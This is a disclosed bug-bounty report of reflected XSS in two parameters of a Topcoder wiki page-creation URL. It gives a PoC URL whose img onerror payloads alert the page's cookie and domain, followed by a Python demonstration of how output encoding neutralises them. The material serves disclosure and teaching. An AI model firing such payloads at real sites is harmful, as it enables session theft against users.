Reflected XSS on https://apps.topcoder.com/wiki/pages/createpage.action

Disclosed: 2020-05-12 13:47:56 By meryem0x To lab45
Medium
Vulnerability Details
## Summary:
Hi :) A reflected XSS occurs on https://apps.topcoder.com/wiki/pages/createpage.action when creating wiki pages.

## Steps To Reproduce:
A user can create wiki pages on https://apps.topcoder.com/wiki/pages/createpage.action?spaceKey=tcwiki. In this URL, the `parentPageString` and `labelsString` parameters are vulnerable to XSS.

PoC: https://apps.topcoder.com/wiki/pages/createpage.action?spaceKey=tcwiki&parentPageString=powerpuff_hackerone%22%3E%3Cimg%20src=X%20onerror=alert(document.cookie)%3E&labelsString=%22%3E%3Cimg+src%3DX+onerror%3Dalert(document.domain)%3E

{F816308} {F816309}

## Impact
XSS can be used to steal cookies or to run arbitrary code on the victim's browser.
Report Stats
  • Report ID: 866576
  • State: Closed
  • Substate: resolved
  • Upvotes: 5
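
The following is an added example, not part of the report and not Topcoder's code. It shows why the `">` prefix in the PoC matters and what output encoding changes. The report does not show the page's markup or how the issue was fixed, so `TEMPLATE` is a constructed stand-in that assumes both parameters are reflected into double-quoted attribute values.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# PoC URL exactly as given in the report.
POC_URL = (
    "https://apps.topcoder.com/wiki/pages/createpage.action?spaceKey=tcwiki"
    "&parentPageString=powerpuff_hackerone%22%3E%3Cimg%20src=X%20onerror=alert(document.cookie)%3E"
    "&labelsString=%22%3E%3Cimg+src%3DX+onerror%3Dalert(document.domain)%3E"
)
# Constructed markup (assumption): both values land in double-quoted attributes.
TEMPLATE = (
    '<input type="text" name="parentPageString" value="{parent}">'
    '<input type="text" name="labelsString" value="{labels}">'
)

class TagCollector(HTMLParser):
    """Collects each start tag with its attributes, as an HTML parser sees them."""
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))

def poc_params():
    """Decode the query string the way the server receives it."""
    return parse_qs(urlsplit(POC_URL).query)

def render(params, encode):
    """Fill the template, HTML-encoding the values (quotes included) if asked."""
    fix = (lambda v: escape(v, quote=True)) if encode else (lambda v: v)
    return TEMPLATE.format(parent=fix(params["parentPageString"][0]),
                           labels=fix(params["labelsString"][0]))

def parsed_tags(markup):
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

def injected(markup):
    """Tags the template never intended: non-input elements or on* handlers."""
    return [(t, a) for t, a in parsed_tags(markup)
            if t != "input" or any(k.startswith("on") for k in a)]

if __name__ == "__main__":
    for encode in (False, True):
        print("encoded" if encode else "raw", injected(render(poc_params(), encode)))
```

With encoding applied, the parser sees only the two `input` elements, and each `value` attribute decodes back to the submitted string as inert text.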